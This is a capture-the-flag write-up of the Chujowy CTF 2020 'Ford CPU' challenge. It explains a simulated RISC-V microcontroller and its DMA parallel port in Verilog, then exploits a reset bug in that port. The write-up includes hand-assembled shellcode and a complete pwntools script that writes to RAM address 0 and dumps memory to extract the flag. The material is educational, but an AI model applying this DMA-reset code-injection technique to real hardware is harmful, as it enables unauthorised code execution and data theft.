This is definitely one of the most interesting CTF challenges that I’ve done in a while. I played Chujowy CTF 2020 with redpwn and did this challenge with pepsipu; it took us about 15 man-hours of fruitless bug hunting and 3 hours of actually pwning things.

With that out of the way, what is this challenge?

I really hate the slow transfer rates of UART, so I’ve designed a custom MCU based on the new cool RISC-V ISA which features a parallel port with DMA.

This CPU will revolutionize the automotive industry - can’t wait to install it in my red ford.

Now slow transfers via UART are a thing of the past! I was too lazy to write tests for the DMA controller in this MCU but I’m 100% sure that I didn’t make any bugs there…

And a part 2:

In case someone gains arbitrary code execution on the risc-v core the Ford CPU provides advanced security mechanisms to protect secrets. The flag device reveals secrets only to people who know a secret pin. Can you steal the flag from the flagdevice?

Author: @gorbak25

Alright, we’ve got a RISC-V MCU and a DMA peripheral with some bugs in it. Looks like part 1 involves RCE, and part 2 is attacking another peripheral on the MCU. Unpacking the provided tarball gives us a simulator for the MCU (Vtop), a bunch of Verilog describing all of the hardware, and the sources of the firmware. Judging by the challenge description, we’ll need to examine the parallel port, which we can find in rtl/axi4_lpt.v. Let’s get going with understanding what all of this does. If you’re familiar with this kind of stuff already, jump right to the first exploit.

Intro to Embedded

We’re working in an embedded environment here, so a lot of the usual tips and tricks for pwning Linux binaries don’t apply. We have a very minimal libc (newlib), no kernel to syscall into, and in this case, also no memory protections whatsoever. One thing I immediately noticed looking through the firmware sources was that the built firmware was named ram.elf—this MCU has RAM only, no ROM, and so the firmware is in (writable) RAM. On board an MCU, we also have a lot of hardware devices that the core (the RISC-V CPU executing our firmware code) can interact with; it’s much like expansion cards on the PCI bus on a standard x86 computer. As is typical with MCUs, everything the CPU can access shares the same address space; interacting with a peripheral is done by writing to or reading from a memory address.

All of the Verilog files (in rtl/) describe these hardware peripherals; there’s also the actual RISC-V CPU itself, which is a PicoRV32 core, located at picorv32/picorv32.v. While the Verilog might look like code for a program at first, it is actually a description of hardware; Verilog is a Hardware Description Language (HDL). And, taking a peek at the build process in build.sh, we can see that a tool called Verilator is used to turn all of this Verilog into C++ code to run the simulation. However, for all intents and purposes, the Verilog is still describing hardware; it just happens to be simulated in software.

To recap so far: we’ve got a RISC-V core which runs our firmware, and alongside it in our simulated hardware, we have some peripherals. Now let’s take a look at the parallel port that we’ll be attacking. In our firmware source, we can see that our core interacts with it by doing memory reads and writes as we discussed before. For example, to send an aligned amount of data through the parallel port, we have this code:

void fast_send(char* str, int size) {
    while (!tx_done);
    tx_done = 0;
    REG32(LPT_REG_TX_BUFFER_START) = (uint32_t)str;
    REG32(LPT_REG_TX_BUFFER_END) = (uint32_t)str + size;
}

Let’s break this down step-by-step. First, we check the tx_done flag, which is a boolean indicating whether or not we’re done transmitting. Notice that we have a while loop that isn’t actually doing anything to update its condition; we’ll come back to this later. Next, we set tx_done to 0, signaling that there is a transmit in progress. Finally, we write to two registers in the parallel port (LPT), telling it where the start and end of our buffer is. Notice we’re not actually sending any of our data directly to the LPT; how is it being sent?

To answer that, we’ll need to hop over to the hardware of the LPT itself. Looking at axi4_lpt.v, we see a section labeled “Control registers” with some registers with names that match up with the registers we accessed from the C code in the firmware:

/// Control registers.

// Master state.
reg [31:0] ctrl_state = 32'b0;
wire       ctrl_state_enable_rx           = ctrl_state[0];
wire       ctrl_state_enable_tx           = ctrl_state[1];

// RX ring buffer controls.
reg [31:0] ctrl_rx_buffer_start_ptr = 32'b0;
reg [31:0] ctrl_rx_buffer_end_ptr   = 32'b0;
reg [31:0] ctrl_rx_buffer_rx_ptr    = 32'b0;
reg rx_done;

// TX ring buffer controls.
reg [31:0] ctrl_tx_buffer_start_ptr = 32'b0;
reg [31:0] ctrl_tx_buffer_end_ptr   = 32'b0;

For now, we can just treat how the values get in to those registers as a black box and look at the interesting part, how our data gets sent. Searching for references to those registers will lead us to this:

// Read from RAM using DMA - send the read result to the serial port
always @(posedge clk) begin
    lpt_out_valid_latch <= 0;
    tx_done <= 0;
    if (!resetn) begin
        axi_master_araddr <= 32'b0;
        axi_master_arvalid <= 0;
        axi_master_rready <= 0;
        tx_latch <= 0;
    end else begin
        if (lpt_out_ready && ctrl_state_enable_tx && ctrl_tx_buffer_start_ptr != ctrl_tx_buffer_end_ptr & axi_master_r_idle) begin
            axi_master_arvalid <= 1;
            axi_master_araddr <= ctrl_tx_buffer_start_ptr;
            axi_master_rready <= 1;
        end else begin
            if (axi_master_arvalid & axi_master_arready) begin
                axi_master_arvalid <= 0;
            end
            if (axi_master_rvalid & axi_master_rready) begin
                axi_master_rready <= 0;
                tx_latch <= axi_master_rdata;
                lpt_out_valid_latch <= 1;
                ctrl_tx_buffer_start_ptr <= ctrl_tx_buffer_start_ptr + 4;
                tx_done <= (ctrl_tx_buffer_start_ptr + 4) == ctrl_tx_buffer_end_ptr;
            end
        end
    end
end

This is a lot to take in at once, but as the comment tells us, what’s happening here is that our peripheral is itself reading from RAM using DMA—direct memory access.

DMA

Essentially all that DMA means is that instead of responding to requests on the memory bus (like how it responds to the core writing to one of its registers), the peripheral is also able to initiate memory access. In our LPT, it’s reading out of the RAM addresses we gave it to send our data out the parallel port—and it’s doing this in hardware, without the core needing to do anything! Remember, all our core needed to do was to tell the LPT where the data we wanted to send was. Our fast_send function then immediately returned—because the core doesn’t need to do anything else; it’s all handled by the LPT’s hardware. We will go into more details about the memory bus later.
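To make the TX path concrete, here is a rough Python model of what the hardware does once fast_send has written the two pointers. It is only a sketch of the always block above: the function name, the `max_words` guard, and the use of a `bytes` object as RAM are assumptions for illustration, and all AXI handshaking is ignored.

```python
def dma_tx(ram: bytes, start: int, end: int, max_words: int = 1 << 16):
    """Toy model of the LPT TX engine: stream 32-bit words from RAM.

    Mirrors the Verilog condition `start_ptr != end_ptr`; `max_words` is a
    guard added for this sketch only, so the model always terminates.
    """
    sent = []
    tx_done = False
    while start != end and len(sent) < max_words:
        sent.append(ram[start:start + 4])   # one DMA read per word
        tx_done = (start + 4) == end        # same comparison as the hardware
        start += 4                          # ctrl_tx_buffer_start_ptr += 4
    return b"".join(sent), tx_done


# The core only supplies the two pointers; the copy itself needs no CPU work.
ram = bytes(range(64))
data, done = dma_tx(ram, 8, 24)
```

Here `data` holds the 16 bytes between the two pointers and `done` is the value that would raise irq_tx_done.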

Let’s compare this to a non-DMA peripheral, the UART. Looking at our firmware source again, we see that we send data to UART via a simple printf call:

// Print welcome message via UART
printf("Booting the HardHardFlag MCU :D\n");
printf("This MCU is running a picorv32 core which I've got from github\n");
printf("It must be 100 percent secure.\n");
printf("I added some peripherals to it via the AXI4 bus xD\n");
printf("I hated the slow transfer rates of UART.\n");
printf("So I've added a parallel port with DMA to it to make it faster xD\n");
printf("TERMINATING SLOW UART - TIME FOR 1337 DMA xD\n");

How does that work? We’ll need to go take a look at Newlib, the embedded C standard library of choice.

Newlib

Newlib is a C standard library that’s designed to be run on embedded microcontrollers without a kernel, so it needs some special effort from the developer to get all of its functions working. Newlib uses a so-called “Board Support Package” (BSP), which essentially is a definition of some of the basic Unix system calls. We can see this in firmware/src/bsp.c:

// Board Support Package for newlib

#include <sys/stat.h>
#include <sys/errno.h>

#include "soc.h"

// ...

// Write to UART.
int _write(int file, char *ptr, int len) {
    for (int i = 0; i < len; i++) {
        REG32(UART_REG_DOUT) = *ptr++;
    }
    return len;
}

// ...

I’ve omitted all of the other system calls for brevity, since we just want to look at how printf works. So we see that by defining _write (write(2)) to write to our UART peripheral, Newlib takes care of making printf work!

Now let’s look a little more closely at what this write function is doing. We loop over every byte in the string to write, and send it to a register—UART_REG_DOUT. In the real world, this is how most IO peripherals on MCUs work—they have a register where you write a word of data to send (with the word size being defined by the particular communication protocol / bus that peripheral is dealing with—for almost everything this is 8 bits), and a similar register where you read the next incoming word. Notice that our core essentially needs to babysit the peripheral while this is happening. In the real world, we would usually also need to wait for the peripheral to become ready again before sending the next byte, but in this challenge the UART actually locks up the memory bus while waiting for data to send. Thus, our memory write instruction will wait (for potentially quite a while!) until the UART can actually send the byte. This results in the transmit delay being transparent in the code, at the cost of our firmware not being able to do anything about the fact that this write might end up taking many, many more clock cycles than expected. Either way, while we are transferring these bytes, our core can’t be executing other code.

Contrast this with DMA, where all we needed to do was to tell the peripheral where the memory we wanted to send was; after doing that, our core is free to go do something else. As the challenge description hints towards, DMA is a great way to speed things up in an MCU; this is because we have separate hardware doing the tedious task of copying memory around for us, and the core can go do other important work in the meantime.

A quick note on the real world again: typically peripherals do not do their own DMA like our LPT in this challenge does. Usually, there is a separate DMA peripheral whose job is only to copy memory from one place on the bus to another, triggered by an interrupt. Looking at how our UART works, it’s pretty easy to see how a dedicated DMA device would function: it would copy data from our memory into the DOUT register every time the UART finishes transmitting a word. This way, a single DMA controller can service basically all of the peripherals on board an MCU, and chip designers can save on silicon by not duplicating this DMA functionality.

Interrupts

Now let’s get back to that magical-seeming tx_done flag—how does it get updated? If we follow it in the firmware code, we see that it gets set by this function:

static void irq_lpt_tx_done(void) {
  tx_done = 1;
}

And where does that function get called? Well, it’s put into a handler table:

static irq_handler irq_handlers[32] = {
    [IRQ_LPT_TX_DONE] = irq_lpt_tx_done,
    [IRQ_LPT_RX_FULL] = irq_lpt_rx_full,
    [IRQ_LPT_RX_DONE] = irq_lpt_rx_done
};

This obscure little bit of C syntax essentially defines the index in the array at which we are putting each value of our array initializer—expect to see a lot of C code like this when working with embedded systems (embedded programmers love using C language features to be able to express certain things symbolically through pure C—registers are often defined as members of a struct for example).

As I’ve hinted, this function is an interrupt handler that gets called when an interrupt is generated. On any CPU, many things can generate interrupts, and when one is raised (an Interrupt ReQuest, or IRQ), the CPU stops whatever it’s currently doing to respond by calling into an Interrupt Service Routine (ISR). As we see here, the LPT generates a few interrupts that our firmware then reacts to, by setting flags such as tx_done or even doing all command processing for input.
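The handler table plus dispatch can be sketched in Python like this. The IRQ numbers below are hypothetical (the real values live in the firmware headers), and the assumption that the top-level handler receives a bitmask of pending IRQs and walks the table is mine, not something shown in the excerpt above.

```python
# Hypothetical IRQ numbers, chosen only for this sketch.
IRQ_LPT_TX_DONE = 5
IRQ_LPT_RX_FULL = 6
IRQ_LPT_RX_DONE = 7

flags = {"tx_done": 0, "rx_full": 0, "rx_done": 0}


def irq_lpt_tx_done():
    flags["tx_done"] = 1


def irq_lpt_rx_full():
    flags["rx_full"] = 1


def irq_lpt_rx_done():
    flags["rx_done"] = 1


# Equivalent of the C designated initializer: 32 slots, three of them filled.
irq_handlers = [None] * 32
irq_handlers[IRQ_LPT_TX_DONE] = irq_lpt_tx_done
irq_handlers[IRQ_LPT_RX_FULL] = irq_lpt_rx_full
irq_handlers[IRQ_LPT_RX_DONE] = irq_lpt_rx_done


def dispatch(pending: int) -> None:
    """Call the handler of every IRQ whose bit is set in `pending`."""
    for irq in range(32):
        if pending & (1 << irq) and irq_handlers[irq] is not None:
            irq_handlers[irq]()


dispatch(1 << IRQ_LPT_TX_DONE)
```

After the call, only `flags["tx_done"]` is set, which is what lets the `while (!tx_done);` loop in fast_send fall through.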

Let’s head back over to the Verilog to see how they’re generated. Looking at axi4_lpt.v again we see the IRQs declared:

// IRQ
output irq_rx_done, // Generate interupt if the last received byte is a nullbyte
output irq_rx_full,
output irq_tx_done

…and then set:

assign irq_tx_done = ctrl_state_enable_tx & tx_done;

So, we can see that our interrupt is raised whenever our transmission is completed; just what we expected from reading the firmware!

AXI

Last is a quick primer on AXI, the Advanced eXtensible Interface. This isn’t really necessary for understanding the exploit, but knowing how AXI works helps to clarify exactly how the peripherals interact with the memory bus.

AXI is a common memory bus used in many different architectures of MCUs; it was originally designed by ARM, but as we can see, there’s nothing stopping us from using it in a RISC-V MCU. Like all memory buses, AXI is based on a master-slave structure—the master initiates a memory transaction (either a read or a write), and the slave responds. The slew of registers at the beginning of the LPT’s module definition declare all of the interface lines for both the master and the slave side of the LPT. Remember, the core reads and writes to the control registers of the LPT to, well, control it; therefore, the LPT needs to be a slave on the AXI bus. But, the LPT also needs to initiate memory operations for DMA, so it has a separate master, also on the AXI bus.

To perform a read or a write, the master sends the address down the relevant a*addr line (awaddr for a write and araddr for a read). The slave needs to then save this address somewhere, because by the time the read or write is actually executed, the master isn’t required to keep the a*addr lines driven with the address any more. This temporary storage is what all of the latched_* registers in the Verilog are for. Similarly, the slave needs to save the data being written (wdata). The timings are governed by a handshaking protocol as well.
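The handshaking rule itself is simple: on each AXI channel, a transfer happens on a clock edge where both the sender’s valid and the receiver’s ready are high. A tiny sketch, with made-up signal traces:

```python
def transfer_cycles(valid, ready):
    """Return the clock cycles on which a valid/ready handshake completes."""
    return [cycle for cycle, (v, r) in enumerate(zip(valid, ready)) if v and r]


# The master raises valid in cycle 1 and holds it; the slave is ready from cycle 3.
valid = [0, 1, 1, 1, 0]
ready = [0, 0, 0, 1, 1]
completed = transfer_cycles(valid, ready)
```

This is why the LPT’s Verilog keeps checking pairs like `axi_master_arvalid & axi_master_arready` before dropping its valid signal.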

There are many more advanced features of the AXI bus that the LPT does not implement, and although they’re certainly interesting if you’re into chip design, they’re not relevant to this CTF challenge.

Now with all of that background out of the way, let’s get into discovering the actual exploit.

Stage 1: DMA

If you want to skip right to the exploit itself, click here.

Remember, our goal is to get code execution. So, we can assume that we’re probably looking for some out of bounds write from the DMA functionality in the LPT. Let’s read over how the RX end of the LPT works, starting with the firmware:

// Enable RX & TX for parallel port
REG32(LPT_REG_RX_BUFFER_START) = cmd;
REG32(LPT_REG_RX_BUFFER_END) = cmd + 256;
REG32(LPT_REG_STATE) = 2 | 1;

So we give the LPT a buffer in globals to write into, and set its state register to enable both RX and TX. Now let’s hop over to the hardware side to see how our received data ends up in the buffer:

wire axi_master_w_idle = !axi_master_awvalid & !axi_master_wvalid & !axi_master_bvalid;
wire space_left = ((ctrl_rx_buffer_end_ptr - ctrl_rx_buffer_rx_ptr - 4) >= 0);
wire fifo_rx = ctrl_state_enable_rx & axi_master_w_idle & lpt_in_valid & space_left & (!rx_done);

// Read from FIFO and make DMA write to RAM
always @(posedge clk) begin
    rx_done_irq <= 0;
    terminator <= 0;
    if (!resetn) begin
        latched_rx <= 32'b0;
        latched_waddr <= 32'b0;
        send <= 0;
        rx_done <= 0;

        axi_master_awvalid <= 0;
        axi_master_awaddr <= 32'b0;
        axi_master_awprot <= 3'b0;
        axi_master_wvalid <= 0;
        axi_master_wstrb <= 4'b0;
        axi_master_wdata <= 32'b0;
        axi_master_wstrb <= 4'b0;
        axi_master_bready <= 0;
    end else begin
        if (fifo_rx) begin
            if (lpt_in_data == 32'h0a0a0a0a) begin
                terminator <= 1;
                rx_done <= 1;
            end else begin
                latched_rx <= lpt_in_data;
                latched_waddr <= ctrl_rx_buffer_rx_ptr;
                send <= 1;
            end
        end

        if (send & axi_master_w_idle) begin
            axi_master_awaddr <= latched_waddr;
            axi_master_awvalid <= 1;
            axi_master_wvalid <= 1;
            axi_master_wdata <= latched_rx;
            axi_master_wstrb <= 4'b1111;
            axi_master_bready <= 1;

            ctrl_rx_buffer_rx_ptr <= ctrl_rx_buffer_rx_ptr + 4;
            rx_done <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
            rx_done_irq <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
            send <= 0;
        end else begin
            if (axi_master_awvalid & axi_master_awready) begin
                axi_master_awvalid <= 0;
            end
            if (axi_master_wvalid & axi_master_wready) begin
                axi_master_wvalid <= 0;
            end
            if (axi_master_bvalid & axi_master_bready) begin
                axi_master_bready <= 0;
            end
        end
    end
end

It’s mostly boring bookkeeping related to the AXI bus, but this is the interesting part:

axi_master_awaddr <= latched_waddr;
axi_master_awvalid <= 1;
axi_master_wvalid <= 1;
axi_master_wdata <= latched_rx;
axi_master_wstrb <= 4'b1111;
axi_master_bready <= 1;

ctrl_rx_buffer_rx_ptr <= ctrl_rx_buffer_rx_ptr + 4;
rx_done <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
rx_done_irq <= (ctrl_rx_buffer_rx_ptr + 4) == ctrl_rx_buffer_end_ptr;
send <= 0;

We write our received data to latched_waddr, which is the value of ctrl_rx_buffer_rx_ptr at the time when we received the incoming data. Then we move ctrl_rx_buffer_rx_ptr forward by 4 bytes (this is a 4-byte-wide parallel port), and say that we’re done if our pointer will end up equaling ctrl_rx_buffer_end_ptr.

First, a quick note on Verilog: the <= operator is a non-blocking assignment. Every right-hand side in the always block is evaluated using the old register values, and the assignments only take effect afterwards, at the end of the time step. We initially thought that there would be some bugs related to this behavior, but ultimately everything was safe. We also notice that if we can get ctrl_rx_buffer_end_ptr to be misaligned, then our DMA will never stop receiving. By itself, this bug isn’t able to accomplish much, but it is functionality that will come in handy later. Another bug we found was in the comparison for space_left. Running verilator --lint-only -Wall rtl/axi4_lpt.v revealed that this was an unsigned comparison which always evaluated to true:

%Warning-UNSIGNED: rtl/axi4_lpt.v:183:73: Comparison is constant due to unsigned arithmetic
                                        : ... In instance axi4_lpt
  183 | wire space_left = ((ctrl_rx_buffer_end_ptr - ctrl_rx_buffer_rx_ptr - 4) >= 0);
      |                                                                         ^~

Again, not very useful right now, but it comes in handy later.
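The same effect is easy to reproduce in Python by masking the subtraction to 32 bits, which is what the unsigned Verilog arithmetic does. The signed variant is only my guess at what the author intended, included for contrast.

```python
MASK32 = 0xFFFFFFFF


def space_left(end_ptr: int, rx_ptr: int) -> bool:
    """The check as the hardware evaluates it: unsigned 32-bit arithmetic."""
    diff = (end_ptr - rx_ptr - 4) & MASK32  # wraps around instead of going negative
    return diff >= 0                        # an unsigned value is never below zero


def space_left_signed(end_ptr: int, rx_ptr: int) -> bool:
    """Presumably the intended check (an assumption): a signed comparison."""
    return end_ptr - rx_ptr - 4 >= 0


cases = [(0x100, 0x0), (0x100, 0x100), (0x0, 0x1000)]
hardware = [space_left(e, r) for e, r in cases]
intended = [space_left_signed(e, r) for e, r in cases]
```

`hardware` is true for every case, including the ones where the write pointer has already reached or passed the end of the buffer.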

So it seems that, under normal circumstances, the RX DMA is safe; however, we’re on the lookout for ways to tamper with ctrl_rx_buffer_rx_ptr and ctrl_rx_buffer_end_ptr in order to get an unbounded write.

This seems like a bit of a dead end, so let’s go look at the firmware some more. We see that the bulk of the logic happens in the interrupt handler for irq_rx_done, including accepting a EULA (looks like we can never escape from those things). Fiddling around with the simulator gave some confusing results though; at first, we were unable to get the MCU to do anything in response to our commands. Since we know command processing gets triggered by irq_rx_done, let’s trace how that gets fired. Hopping back over to Verilog, we see this:

// Route IRQ
reg tx_done;
assign irq_rx_done = ctrl_state_enable_rx & terminator;
assign irq_rx_full = ctrl_state_enable_rx & rx_done_irq & !terminator;
assign irq_tx_done = ctrl_state_enable_tx & tx_done;

So irq_rx_done is raised whenever terminator is raised. Where does that happen?

if (lpt_in_data == 32'h0a0a0a0a) begin
  terminator <= 1;
  rx_done <= 1;
end

It seems our input has to be 4 newlines (0a0a0a0a) in order for the done interrupt to be triggered. Although bizarre, in a way it still makes sense, since we have a 4 byte wide parallel port; it’s natural for it to need things aligned to 4 bytes. So, we make a note that we can raise irq_rx_done by sending an aligned set of 4 newlines (which drops those 4 newlines), and continue with our analysis.
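Since the comparison is made on whole 32-bit words, alignment decides whether the newlines are seen at all. A small sketch (the helper names are made up) that splits an input stream into words the way the port receives them:

```python
TERMINATOR = b"\n" * 4  # 0x0a0a0a0a, identical in either byte order


def split_words(stream: bytes):
    """Split a stream into the 4-byte words the parallel port would see."""
    assert len(stream) % 4 == 0, "the port only moves whole 32-bit words"
    return [stream[i:i + 4] for i in range(0, len(stream), 4)]


def first_terminator(stream: bytes):
    """Index of the first word that would raise irq_rx_done, or None."""
    for index, word in enumerate(split_words(stream)):
        if word == TERMINATOR:
            return index
    return None


aligned = b"ack\n" + b"\n" * 4               # command padded to 4 bytes, then terminator
misaligned = b"ab" + b"\n" * 4 + b"\0\0"     # the four newlines straddle two words
aligned_hit = first_terminator(aligned)
misaligned_hit = first_terminator(misaligned)
```

Only the aligned input produces a terminator word; in the misaligned one the newlines are simply stored as data.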

After quite a lot of time spent with little progress, pepsipu noted that we must have been given the ability to reset the MCU for a reason:

if(tries == 2) {
    // Send trap so the simulator reboots the CPU
    tries = 0;
    flag_mode = 0;
    eula_accepted = 0;
    __asm__ __volatile__ ("ebreak");
}

Alright, so how does the reset process work? To answer that, we actually need to go look at the simulator’s source code (in the top-level main.cpp):

if (top->trap) {
    // Reset on CPU failure.
    fprintf(stdout, "resetting...\n");
    top->resetn = 0;
    c(10);
    top->resetn = 1;
}

c is a function that ticks the MCU for the requested number of clock cycles. So we see that on reset, resetn goes low for 10 clock cycles, and then is set high again. Let’s see what that does in our LPT. Remember, we’re looking for ways to get the LPT to write out of bounds.

if (!resetn) begin
    ctrl_rx_buffer_start_ptr <= 32'b0;
    ctrl_rx_buffer_end_ptr <= 32'b0;
    ctrl_rx_buffer_rx_ptr <= 32'b0;

    ctrl_tx_buffer_start_ptr <= 32'b0;
    ctrl_tx_buffer_end_ptr <= 32'b0;
end

So our rx and end pointer are both set to address 0… if we recall the bounds check, the LPT only cares about what rx_ptr is after we increment. So, if we can get the LPT to start reading in this state, we have an unbounded write to RAM starting at address 0!
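A quick model of the pointer bookkeeping shows why. This is a simplified sketch that ignores the terminator word and the AXI handshake; the function name and return shape are assumptions.

```python
MASK32 = 0xFFFFFFFF


def dma_rx(words, rx_ptr: int, end_ptr: int):
    """Feed received words to a toy RX engine; return (writes, rx_done)."""
    writes = []
    rx_done = False
    for word in words:
        if rx_done:                      # fifo_rx is gated on !rx_done
            break
        writes.append((rx_ptr, word))    # DMA write to the latched address
        rx_done = ((rx_ptr + 4) & MASK32) == end_ptr  # checked after the increment
        rx_ptr = (rx_ptr + 4) & MASK32
    return writes, rx_done


words = [b"AAAA", b"BBBB", b"CCCC", b"DDDD"]

# Normal operation: an 8-byte buffer accepts two words, then stops.
normal_writes, normal_done = dma_rx(words, rx_ptr=0x1000, end_ptr=0x1008)

# After reset: both pointers are 0, so the first comparison is 4 == 0 and
# the engine keeps writing upwards from address 0.
reset_writes, reset_done = dma_rx(words, rx_ptr=0, end_ptr=0)
```

In the post-reset case the pointer would have to wrap all the way around the 32-bit address space before the comparison could succeed.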

Now we just need to check what conditions need to be met for the LPT to start doing DMA RX. It’s controlled by the fifo_rx wire we saw earlier:

wire fifo_rx = ctrl_state_enable_rx & axi_master_w_idle & lpt_in_valid & space_left & (!rx_done);

We see that rx_done is cleared on reset:

if (!resetn) begin
    latched_rx <= 32'b0;
    latched_waddr <= 32'b0;
    send <= 0;
    rx_done <= 0;

    axi_master_awvalid <= 0;
    // ...
end

We already established space_left is always high, so that just leaves ctrl_state_enable_rx. That is defined as the low bit of ctrl_state:

reg [31:0] ctrl_state = 32'b0;
wire       ctrl_state_enable_rx           = ctrl_state[0];
wire       ctrl_state_enable_tx           = ctrl_state[1];

…which, if we trace through the Verilog, is never cleared on reset! This means ctrl_state (and by extension, ctrl_state_enable_rx) keeps whatever value it had before the MCU reset, which is the enabled state!
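Putting the pieces together, the post-reset state can be sketched as a small register model. The class and field names are made up for illustration, space_left is hard-wired to true as established earlier, and 0xe994 is the address of cmd in the firmware we were given.

```python
from dataclasses import dataclass


@dataclass
class LptRegs:
    ctrl_state: int = 0
    rx_start: int = 0
    rx_end: int = 0
    rx_ptr: int = 0
    rx_done: bool = False

    def reset(self) -> None:
        """What resetn does: pointers and rx_done are cleared, ctrl_state is not."""
        self.rx_start = self.rx_end = self.rx_ptr = 0
        self.rx_done = False

    def fifo_rx(self, lpt_in_valid: bool = True, w_idle: bool = True) -> bool:
        enable_rx = bool(self.ctrl_state & 1)
        space_left = True  # the unsigned comparison is constant
        return (enable_rx and w_idle and lpt_in_valid
                and space_left and not self.rx_done)


# State as the firmware left it: RX and TX enabled, buffer pointing at cmd.
regs = LptRegs(ctrl_state=2 | 1, rx_start=0xE994, rx_end=0xE994 + 256, rx_ptr=0xE994)
regs.reset()
accepting_input = regs.fifo_rx()
```

After `reset()`, the model is still willing to accept input, and the next word received would be written to address 0.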

Dumping the firmware

To summarize, on reset we are able to write whatever we want to RAM starting from address 0. This is the entrypoint for our RISC-V core, which normally contains a jump to _start. But we can repurpose this space to do some evil things.

The first thing we tried doing was writing a jump into our buffer where our input gets placed under normal execution, so that we have more space to work with (the interrupt handler is located at address 0x10). We got as far as locally working exploits only to discover that, since the fake flag in the C code was replaced with the (longer) real flag, the offset of that buffer was different on the server’s firmware than on the firmware we were provided. So instead we changed tack and decided to cram our shellcode in those first 16 bytes, and to abuse the LPT’s TX DMA to dump all of RAM.

To pull this off, we need to reset the MCU, and then write our shellcode in (at address 0) before the MCU’s firmware starts up and writes to the control register. This is because as soon as the master state register is written to:

// Enable TX for parallel port
REG32(LPT_REG_STATE) = 2;

…our RX mode will be turned off. Thankfully, the MCU spends a lot of CPU cycles slowly printing a message using the UART and then waiting:

// Wait some time for the UART to be send to the user
for(int i = 0; i<20000; i++);

…which gives us the time to load our shellcode.

Now, what’s our shellcode? It turns out, the TX of the LPT has a very similar issue with its bounds check, which means that a misaligned end will result in the LPT never stopping transmission:

axi_master_rready <= 0;
tx_latch <= axi_master_rdata;
lpt_out_valid_latch <= 1;
ctrl_tx_buffer_start_ptr <= ctrl_tx_buffer_start_ptr + 4;
tx_done <= (ctrl_tx_buffer_start_ptr + 4) == ctrl_tx_buffer_end_ptr;

The LPT will transmit for as long as its start_ptr is not exactly equal to its end_ptr, and it has transmission enabled. TX was previously enabled by the firmware before reset, and is not cleared by the reset, and start_ptr is set to 0 on reset, so all we need to get the LPT dumping memory is to nudge the end_ptr. Finally, we want to enter an infinite loop so that our LPT has time to dump all of our RAM. This is our shellcode, which we then assembled with GNU as (riscv32-elf-as):

  li x1, 0xf0010000
  li x2, 1
  sw x2, 0x14(x1)
loop:
  j loop

To exploit, all we need to do is send this immediately after we trigger the reset, which will load our shellcode at address 0. However, this happens after the core has already executed the code at address 0, so the MCU is running the normal firmware again. This is why it’s important not to clobber the interrupt handler: otherwise, our shellcode would interfere with the firmware, which would stop functioning and prevent us from doing a second reset. Using the reset functionality again, we get the MCU to restart execution at address 0 and run our shellcode, at which point we can then save all the memory that’s being dumped.

In hindsight, we could have also put our shellcode in the interrupt handler, but it was so small that it fit under the interrupt handler anyways.
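As a sanity check, the two uncompressed instructions can be encoded by hand from the RISC-V U-type and S-type formats, and the total size compared against the 16 bytes available below the interrupt handler. The helper names are made up for this sketch; the two 16-bit halfwords are the compressed li and the self-jump, copied verbatim from the exploit script rather than derived here.

```python
import struct


def encode_lui(rd: int, imm20: int) -> int:
    """U-type: imm[31:12] | rd | opcode 0x37."""
    return ((imm20 & 0xFFFFF) << 12) | (rd << 7) | 0x37


def encode_sw(rs2: int, rs1: int, offset: int) -> int:
    """S-type: imm[11:5] | rs2 | rs1 | funct3=010 | imm[4:0] | opcode 0x23."""
    imm = offset & 0xFFF
    return (((imm >> 5) << 25) | (rs2 << 20) | (rs1 << 15)
            | (0b010 << 12) | ((imm & 0x1F) << 7) | 0x23)


lui = encode_lui(rd=1, imm20=0xF0010)        # li x1, 0xf0010000 needs only a lui
sw = encode_sw(rs2=2, rs1=1, offset=0x14)    # sw x2, 0x14(x1)

# Little-endian layout: 32-bit lui, 16-bit li, 32-bit sw, 16-bit jump.
shellcode = struct.pack("<IHIH", lui, 0x4105, sw, 0x2001)
```

The result is 12 bytes, so it ends before the handler at 0x10 with 4 bytes to spare.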

#!/usr/bin/env python3
from pwn import *
import subprocess
import shlex
import math

if args.REMOTE:
    p = remote('ford-cpu.chujowyc.tf', 4001)
    with log.progress('Doing POW'):
        p.recvuntil(b'output of:\n')
        hashcash_cmd = p.recvline().decode()
        hashcash = subprocess.run(shlex.split(hashcash_cmd), stdout=subprocess.PIPE)
        hashcash_stamp = hashcash.stdout.decode().replace('hashcash stamp: ', '').strip()
        p.sendlineafter(b'hashcash stamp:', hashcash_stamp.encode())
else:
    p = process('./Vtop')

def d_send(s: bytes):
    # pad out to 4 byte aligned
    s_len = math.ceil(len(s) / 4) * 4
    s = s.ljust(s_len, b'\0')
    p.send(s)

def fw_send(s: bytes):
    d_send(s)
    p.send(b'\n'*4)

def fw_goto_prompt():
    with log.progress('Waiting for prompt'):
        p.recvuntil(b'xD xD XD Can you PWN my DMA controller? xD xD XD\n')

def fw_enter_flag_cmp():
    with log.progress('Entering flag compare mode'):
        fw_send(b'ack\n')
        p.recvuntil(b'OK\n')
        fw_send(b'cmp\n')
        p.recvuntil(b'Now you have 3 tries to guess the flag\n')

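# Hand-assembled RV32IC shellcode: 12 bytes, so it ends before the IRQ handler at 0x10.
SHELLCODE = (
    p32(0xf00100b7) +  # lui   ra,0xf0010  (ra = 0xf0010000)
    p16(0x4105    ) +  # c.li  sp,1
    p32(0x0020aa23) +  # sw    sp,20(ra)   (store 1 to misalign the TX end pointer)
    p16(0x2001    )    # c.jal with offset 0: jumps to itself, infinite loop
)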

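fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('resetting'):
    # Two wrong guesses are each answered with INVALID FLAG; the third makes the firmware trap.
    for _ in range(2):
        fw_send(b'bruh')
        p.recvuntil(b'INVALID FLAG\n')
    fw_send(b'bruh')

# First reset: RX DMA is still enabled with rx_ptr == 0, so this lands at address 0.
d_send(SHELLCODE)

# Second reset: the core restarts at address 0 and runs the shellcode.
fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('resetting'):
    for _ in range(2):
        fw_send(b'bruh')
        p.recvuntil(b'INVALID FLAG\n')
    fw_send(b'bruh')

p.recvuntil(b'resetting...\n')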

with log.progress('Dumping'):
    caddr = 0
    with open('dump.bin', 'wb') as fd:
        while caddr < 0x10000:
            recvd = p.recv(4096)
            fd.write(recvd)
            caddr += len(recvd)

This will create dump.bin containing all of the RAM of the MCU—open it up with radare and look for the flag.

